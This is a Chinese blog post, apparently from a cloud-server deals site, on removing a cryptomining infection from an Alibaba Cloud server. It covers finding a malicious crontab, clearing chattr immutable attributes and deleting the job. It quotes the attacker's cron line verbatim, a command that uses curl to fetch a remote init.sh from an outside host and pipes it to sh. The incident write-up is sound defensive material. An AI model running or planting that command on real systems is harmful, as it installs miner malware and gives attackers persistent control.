云服务器网（yun.pprpp.com）提供：最新服务器优惠、最优配置选择。

阿里云被挖矿怎么办?最近自己买了一台阿里云的Ecs学生机用来玩玩，已经好久没有管了，最近每天凌成三点阿里云发短信提示出现紧急安全事件：挖矿程序，建议紧急处理。实在受不了了，登录阿里云查看了一下监控，所有指标正常，网上所说的肉机特征完全没有出现，但是短信天天提醒，MD只能继续处理一下。下面，看一下我是怎么处理阿里云服务器提示有挖矿程序这样的问题的！

症状：

先top free df看一下，老铁没毛病啊，然后还是发现了一些异常文件，当时没有截图，导致大家看不了，于是赶紧一顿rm * -rf

哈哈，没有了，开心一下。。。。。。。第二天短信依然而来，细心的我发现了有个定时任务(crontab -l查看)有条语句:

*/6 * * * * curl -fsSL http://w.3ei.xyz:43768/init.sh | sh > /dev/null 2>&1

解决：

找到问题赶紧解决，删除定时任务文件，执行 crontab -e 命令，提示如下错误

crontab: installing new crontab
/var/spool/cron/tmp.XXXX6bK9dR: Permission denied
crontab: edits left in /tmp/crontab.ssXqpW

通过报错信息发现是 /var/spool/cron/目录无法写入。 目录被设置为不能被删除、改名、设定链接关系，同时不能写入或新增内容。

解决方案：

执行如下命令，进入 /var/spool/cron/目录。
cd /var/spool/cron/

执行如下命令，进行写入测试。
touch abc

系统显示类似如下，无法写入。

touch: cannot touch `abc’: Permission denied

此时想到，目录可能有什么特殊的地方，root用户也被约束了。

切换到上级目录，执行如下命令。
lsattr cron/

系统显示类似如下，发现文件有“ai”属性。

—-ai——–e- cron/root

查找资料“i”属性设定文件不能被删除、改名、设定链接关系，同时不能写入或新增内容；a是访问具有属性集的文件时，不会修改其atime记录，这可以避免一定量的磁盘I / O操作

4. 执行如下命令，删除“ia”属性。

chattr -ai cron/

5.再次执行 crontab -e 命令，系统显示类似如下

crontab: installing new crontab
crontab: error renaming /var/spool/cron/tmp.XXXXwhWDUP to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.5f279w

6.执行如下命令，修改/var/spool/cron/root权限

chattr -ai cron/root

7.执行 crontab -e 命令，系统显示类似如下，表示恢复正常。

crontab: installing new crontab

8.解决问题删除害虫文件

crontab -r

问题解决：

开心啊，从自通过处理以后，就再也没有收到报警短信了，o(∩_∩)o 哈哈

原文地址：http://yun.pprpp.com/zhi/fwq/YEWPrdYbhdvdcxOCxUoivrL/

买云服务器有优惠，就上：云服务器网（yun.pprpp.com）